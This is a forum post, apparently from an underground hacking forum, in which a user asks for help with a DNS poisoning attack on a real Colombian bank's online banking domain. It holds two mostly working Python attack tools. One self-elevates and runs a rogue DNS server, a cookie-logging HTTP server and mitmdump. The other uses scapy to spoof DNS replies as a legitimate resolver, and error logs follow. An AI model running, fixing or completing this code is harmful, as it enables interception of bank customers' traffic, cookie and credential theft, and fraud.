• XSS.stack #1 – первый литературный журнал от юзеров форума

DNS POISONING

Отслеживать
святой бог

святой бог

HDD-drive
Пользователь
Регистрация
26.07.2023
Сообщения
41
Реакции
2
I'm trying to dns poisoning a target but i dont understand the attack at all, could someone pls explain me what i'm doing wrong?

Python: 
import os
import sys
import threading
import subprocess
import time
import signal

# --------------------------------------------------------------------------------
# 1) ELEVACIÓN A ADMINISTRADOR (auto‐runas)
# --------------------------------------------------------------------------------

def is_admin():
    """
    Retorna True si el script se está ejecutando con privilegios de Administrador en Windows.
    """
    try:
        import ctypes
        return ctypes.windll.shell32.IsUserAnAdmin() != 0
    except Exception:
        return False

def relaunch_as_admin():
    """
    Relanza el script actual pidiendo UAC (Run as Administrator) y termina la instancia actual.
    """
    import ctypes
    script = os.path.abspath(sys.argv[0])
    params = " ".join([f'"{arg}"' for arg in sys.argv[1:]])
    # ShellExecuteW(lpOperation, lpFile, lpParameters, lpDirectory, nShowCmd)
    ctypes.windll.shell32.ShellExecuteW(
        None,
        "runas",      # Pide UAC
        sys.executable,  # Ruta a python.exe
        f'"{script}" {params}',
        None,
        1  # 1 = SW_SHOWNORMAL
    )
    sys.exit(0)

if not is_admin():
    print("[*] No se detectan permisos de Administrador. Solicitando elevación UAC...")
    relaunch_as_admin()

# --------------------------------------------------------------------------------
# 2) IMPORTS Y CONFIGURACIÓN GENERAL
# --------------------------------------------------------------------------------

from dnslib import DNSRecord, DNSHeader, RR, QTYPE, A
from dnslib.server import DNSServer, BaseResolver, DNSLogger

from http.server import HTTPServer, BaseHTTPRequestHandler

# Dominio autoritativo
DOMAIN = "virtual.bancodebogota.co."


VPS_IP = "xxxxxxxx" 

# TTL para respuestas DNS (en segundos)
FAKE_TTL = 120

# Puerto HTTP (puerto privilegiado)
PORT_HTTP = 80

# Puerto HTTPS (puerto privilegiado) para mitmproxy
PORT_HTTPS = 443

# --------------------------------------------------------------------------------
# 3) IMPLEMENTACIÓN DEL RESOLVER DNS AUTORITATIVO
# --------------------------------------------------------------------------------

class AuthoritativeResolver(BaseResolver):
    """
    Responde autoritativamente consultas A de DOMAIN → VPS_IP.
    Si llegan otras consultas (o QNAME distinto), retorna NXDOMAIN.
    """
    def resolve(self, request, handler):
        qname = request.q.qname
        qtype = request.q.qtype
        # Construimos la respuesta DNS con header:
        reply = DNSRecord(DNSHeader(id=request.header.id, qr=1, aa=1, ra=0), q=request.q)

        qn = str(qname).lower().rstrip(".")
        dom = DOMAIN.rstrip(".").lower()

        if qn == dom and qtype == QTYPE.A:
            reply.add_answer(RR(
                rname=qname,
                rtype=QTYPE.A,
                rclass=1,
                ttl=FAKE_TTL,
                rdata=A(VPS_IP)
            ))
        else:
            # NXDOMAIN
            reply.header.rcode = 3

        return reply

def start_dns_server():
    """
    Inicia un servidor DNS autoritativo UDP/53 para DOMAIN.
    """
    print(f"[DNS] Iniciando DNS autoritativo para {DOMAIN} en 0.0.0.0:53 …")
    resolver = AuthoritativeResolver()
    logger = DNSLogger(prefix=False)
    server = DNSServer(resolver, port=53, address="0.0.0.0", tcp=False, logger=logger)
    server.start_thread()  # Ejecuta en un thread separado
    return server

# --------------------------------------------------------------------------------
# 4) IMPLEMENTACIÓN DEL SERVIDOR HTTP (PUERTO 80)
# --------------------------------------------------------------------------------

class AuditHTTPHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        client_ip = self.client_address[0]
        ua = self.headers.get("User-Agent", "-")
        cookies = self.headers.get("Cookie", "-")
        path = self.path

        print("\n[HTTP] PETICIÓN HTTP RECIBIDA:")
        print(f"    • Cliente IPv4: {client_ip}")
        print(f"    • User-Agent  : {ua}")
        print(f"    • Cookies     : {cookies}")
        print(f"    • Path        : {path}\n")

        with open("auditoria.log", "a", encoding="utf-8") as f:
            f.write(f"[{time.ctime()}] {client_ip} | UA={ua} | Cookies={cookies} | Path={path}\n")

        self.send_response(200)
        self.send_header("Content-Type", "text/plain; charset=utf-8")
        self.end_headers()
        self.wfile.write("Servidor de Auditoría MIPYMES (HTTP)".encode("utf-8"))

    def log_message(self, format, *args):
        # Suprimir el log por defecto
        return

def start_http_server():
    """
    Inicia HTTPServer en 0.0.0.0:80 usando AuditHTTPHandler.
    """
    try:
        httpd = HTTPServer(("0.0.0.0", PORT_HTTP), AuditHTTPHandler)
        print(f"[HTTP] Servidor HTTP iniciado en 0.0.0.0:{PORT_HTTP}")
        httpd.serve_forever()
    except PermissionError:
        print("[ERROR] Necesitas privilegios de Administrador para bindear al puerto 80.")
        sys.exit(1)
    except Exception as e:
        print(f"[ERROR] Error iniciando HTTP server en puerto {PORT_HTTP}: {e}")
        sys.exit(1)

# --------------------------------------------------------------------------------
# 5) INICIAR MITMPROXY (PUERTO 443)
# --------------------------------------------------------------------------------

def start_mitmproxy():
    """
    Ejecuta mitmdump en 0.0.0.0:443 para interceptar TODO HTTPS.
    - --set flow_detail=2 para logs detallados.
    - --ssl-insecure para no validar upstream.
    - -w mitm_traffic.log para guardar flujos.
    """
    args = [
        "mitmdump",
        "-p", str(PORT_HTTPS),
        "--set", "flow_detail=2",
        "--ssl-insecure",
        "-w", "mitm_traffic.log"
    ]
    print(f"[TLS] Iniciando mitmdump (escuchando en 0.0.0.0:{PORT_HTTPS}) …")
    print(f"     Comando: {' '.join(args)}")
    try:
        subprocess.Popen(args, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
    except FileNotFoundError:
        print("    ❌ mitmdump no se encontró. Instala mitmproxy y verifica que mitmdump esté en tu PATH.")
        sys.exit(1)

# --------------------------------------------------------------------------------
# 6) EJECUCIÓN PRINCIPAL
# --------------------------------------------------------------------------------

if __name__ == "__main__":
    print(f"""
===============================================================
   🌐 DNS + HTTP + HTTPS “MITM” FUERA DE RED LOCAL (Windows)
                  Dominio: {DOMAIN}
                  IP Este Host: {VPS_IP}
    -----------------------------------------------------------------
    1) Servidor DNS autoritativo en UDP/53 responde:
         {DOMAIN}{VPS_IP} (TTL={FAKE_TTL})
    2) Servidor HTTP en puerto {PORT_HTTP} registra User-Agent, Cookies y Path.
       Guarda todo en auditoria.log.
    3) mitmdump en puerto {PORT_HTTPS} intercepta TODO HTTPS y
       guarda flujos en mitm_traffic.log.
    4) Cualquier víctima en Internet que visite:
         http://{DOMAIN}   o   https://{DOMAIN}
       terminará en este servidor y quedarán sus datos registrados.
===============================================================
""")

    # 1) Iniciar DNS autoritativo (UDP/53)
    dns_server = start_dns_server()

    # 2) Iniciar HTTP server (puerto 80) en thread
    threading.Thread(target=start_http_server, daemon=True).start()

    # 3) Iniciar mitmproxy (puerto 443) en thread
    threading.Thread(target=start_mitmproxy, daemon=True).start()

    # 4) Mantener vivo hasta Ctrl+C
    try:
        while True:
            time.sleep(1)
    except KeyboardInterrupt:
        print("\n[!] Cerrando todos los servicios…")
        dns_server.stop()
        sys.exit(0)
i only get a privilege esc error at run time
 
also i just try another way which return me a bunch of nonesense params with 400 bad request errors
Python: 
from scapy.all import *
from scapy.layers.dns import DNS, DNSQR, DNSRR
from scapy.layers.inet import IP, UDP
import threading
import time
import sys
import subprocess

# =====================================================================
# CONFIGURACIÓN DEL ENTORNO
# =====================================================================
INTERFACE = "Ethernet 17"
LEGITIMATE_DNS_IP = "143.204.23.2"  # DNS legítimo a suplantar
ATTACKER_IP = "192xxxxx"
TARGET_DOMAIN = "virtual.bancodebogota.co"  # Dominio target
SPOOF_IP = "192.xxxxxxx"
PORT_MONITORING = 8080  # Puerto local para HTTP
PORT_PROXY = 8081  # Puerto donde mitmproxy capturará tráfico


# =====================================================================

def dns_sniffer():
    print(f"[+] Iniciando sniffer en interfaz {INTERFACE}...")
    sniff_filter = f"udp port 53 and host {LEGITIMATE_DNS_IP}"
    sniff(iface=INTERFACE, filter=sniff_filter, prn=analyze_dns, store=0)


def analyze_dns(pkt):
    if pkt.haslayer(DNSQR) and pkt[IP].src != ATTACKER_IP:
        domain = pkt[DNSQR].qname.decode().rstrip('.')
        if TARGET_DOMAIN in domain:
            print(f"[!] DNS query detectada: {domain} desde {pkt[IP].src}")
            threading.Thread(target=send_poisoned_response, args=(pkt,)).start()


def send_poisoned_response(pkt):
    try:
        ip_layer = IP(src=LEGITIMATE_DNS_IP, dst=pkt[IP].src)
        udp_layer = UDP(dport=pkt[UDP].sport, sport=53)
        dns_layer = DNS(
            id=pkt[DNS].id,
            qr=1, aa=1,
            qd=pkt[DNS].qd,
            an=DNSRR(
                rrname=pkt[DNS].qd.qname,
                type="A", rclass="IN",
                ttl=600,
                rdata=SPOOF_IP
            )
        )
        send(ip_layer / udp_layer / dns_layer, verbose=0, iface=INTERFACE)
        print(f"[+] Respuesta envenenada enviada para {pkt[DNS].qd.qname.decode()}")
    except Exception as e:
        print(f"[!] Error enviando respuesta: {str(e)}")


def start_http_monitor():
    """Servidor HTTP local para capturar metadatos"""
    from http.server import HTTPServer, BaseHTTPRequestHandler

    class MetadataHandler(BaseHTTPRequestHandler):
        def do_GET(self):
            client_ip = self.client_address[0]
            print(f"\n[📡] HTTP Metadata desde {client_ip}:")
            print(f"User-Agent: {self.headers.get('User-Agent')}")
            print(f"Path: {self.path}")
            print(f"Headers: {dict(self.headers)}")
            self.send_response(200)
            self.end_headers()
            self.wfile.write(b"Servidor de Prueba (metadatos capturados)")

    print(f"[🌐] Servidor HTTP corriendo en {ATTACKER_IP}:{PORT_MONITORING}")
    HTTPServer((ATTACKER_IP, PORT_MONITORING), MetadataHandler).serve_forever()


def start_mitmproxy():
    """Inicia mitmproxy para inspección avanzada"""
    print(f"[🔍] Iniciando mitmproxy en el puerto {PORT_PROXY}...")
    try:
        subprocess.Popen([
            "mitmdump",
            "--mode", "transparent",
            "--listen-port", str(PORT_PROXY),
            "--showhost"
        ])

    except FileNotFoundError:
        print("[!] mitmproxy no está instalado. Instálalo con: pip install mitmproxy")


if __name__ == "__main__":
    if sys.platform != "win32":
        print("[!] Este script está diseñado para ejecutarse en Windows")
        exit(1)

    print(f"""
    ========================================================
    🧪 DNS CACHE POISONING TOOL - ENTORNO DE PRUEBA CONTROLADO
    Dominio objetivo:   {TARGET_DOMAIN}
    DNS legítimo:       {LEGITIMATE_DNS_IP}
    IP de redirección:  {SPOOF_IP}
    IP atacante (local):{ATTACKER_IP}
    Puerto HTTP local:  {PORT_MONITORING}
    Puerto mitmproxy:   {PORT_PROXY}
    ========================================================
    """)

    threading.Thread(target=dns_sniffer, daemon=True).start()
    threading.Thread(target=start_http_monitor, daemon=True).start()
    threading.Thread(target=start_mitmproxy, daemon=True).start()

    try:
        while True: time.sleep(1)
    except KeyboardInterrupt:
        print("\n[!] Cerrando laboratorio...")

this is the log

[+] Iniciando sniffer en interfaz Ethernet 17...
[🔍] Iniciando mitmproxy en el puerto 8081...
[🌐] Servidor HTTP corriendo en 192.168.1.12:8080
[01:41:38.967] Transparent mode on Windows is unsupported, flaky, and deprecated. Consider using local redirect mode or WireGuard mode instead.
[01:41:40.999] Transparent Proxy listening at *:8081.
192.168.1.12 - - [05/Jun/2025 01:42:13] code 400, message Bad HTTP/0.9 request type ('\\x16\\x03\\x01\\x01M\\x01\\x00\\x01I\\x03\\x03w')
192.168.1.12 - - [05/Jun/2025 01:42:13] "\x16\x03\x01\x01M\x01\x00\x01I\x03\x03w #\x88UB" 400 -
192.168.1.12 - - [05/Jun/2025 01:42:17] code 400, message Bad request version ('^0/')
192.168.1.12 - - [05/Jun/2025 01:42:17] "\x16\x03\x01\x07\x19\x01\x00\x07\x15\x03\x03\\ó#nkÄúæ\x13Ì\x1d°É\x1fs¦\x98Ë\x84nÿ\x7f\x86¬lQw?Ó\x80\x02V <#Q(+üÑU¶\x14Ë"^HÃõw\x93ùæ\x15é\x06Z\x87Q\x9b\x11ªõ°\x00 ZZ\x13\x01\x13\x02\x13\x03À+À/À,À0̨̩À\x13À\x14\x00\x9c\x00\x9d\x00/\x005\x01\x00\x06¬ÊÊ\x00\x00\x00\x17\x00\x00þ\x0d\x00º\x00\x00\x01\x00\x01Ê\x00 \x89¾\x9e³åª´\x19õ5\x92R·#\x0b¡´àå\x02¦\x91+Ê\x9a¬Þà))wr\x00\x90UKë\x9c%\x05\x8bJÐ%-\x9däVh\x8aâ/\x1a\x18Õá\x1bþÛû\x13\x15\x98Hµ0ÉR@õ!+õè\x92Éõ#\x99\x8cùÁ£\\¯;G'·'\x98Í\x90½\x07k\x86D\x0eCÇR \x90\x1e\x8e:\x09Á`\x10XT7G[ùõç\x19¼ßÌF\x11\x01ÑF´!r7úÏOmñ5¡½£pÔ\x0d'1A¡® a×Ï\x92\x037\x9d28\x0b^0/" 400 -
192.168.1.12 - - [05/Jun/2025 01:42:17] code 400, message Bad request version ('\\x00\\x12\\x00\\x10\\x04\\x03\\x08\\x04\\x04\\x01\\x05\\x03\\x08\\x05\\x05\\x01\\x08\\x06\\x06\\x01\\x00\\x1b\\x00\\x03\\x02\\x00\\x02\\x00')
192.168.1.12 - - [05/Jun/2025 01:42:17] "\x16\x03\x01\x07\x19\x01\x00\x07\x15\x03\x03\x9es\x9c:\x07\\º\x16Z«P\x18z<Æ\x112Ê$ûL7 jµ-\x04ÿlù\x936 \x00\x89=\x0bCùòH\x8b^<Ìä\x0dd|ÃcD:Ê\x83gA\x03ö\x1dåÌRYª\x00 \x1a\x1a\x13\x01\x13\x02\x13\x03À+À/À,À0̨̩À\x13À\x14\x00\x9c\x00\x9d\x00/\x005\x01\x00\x06¬JJ\x00\x00\x00\x10\x00\x0b\x00\x09\x08http/1.1þ\x0d\x00º\x00\x00\x01\x00\x01ù\x00 &1â\x97jô\x90\x97m\x17øF{\x03?ØMÐSáºÓ¾ÿïͼ~YHu)\x00\x90\x1biø\x12\x81å+^\x8c\x17íð`OuC3\x13gÄ|\x07\x13\x10lqme÷\x93ëj}\x98½[\x1b5\x90b+\x03"«®0\x1aF\x0bO&e¡üÖÇ\x99Îg\x09Áòö \x84éá¾öB\x92 y\x8a\x95W\x13ɽ)\x0c\x1e\x15v¢b\x0däÕ^\x09z\x06\x08äÁ@º\x9abï¹jù|Úé\x01Ö>?KÅÆóX·Ù\x97ì\x10\x06\x1f[fùáTÅ%=\x85áâæ÷åzBäè\x81Hå\x00\x12\x00\x00\x00\x0d\x00\x12\x00\x10\x04\x03\x08\x04\x04\x01\x05\x03\x08\x05\x05\x01\x08\x06\x06\x01\x00\x1b\x00\x03\x02\x00\x02\x00" 400 -
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх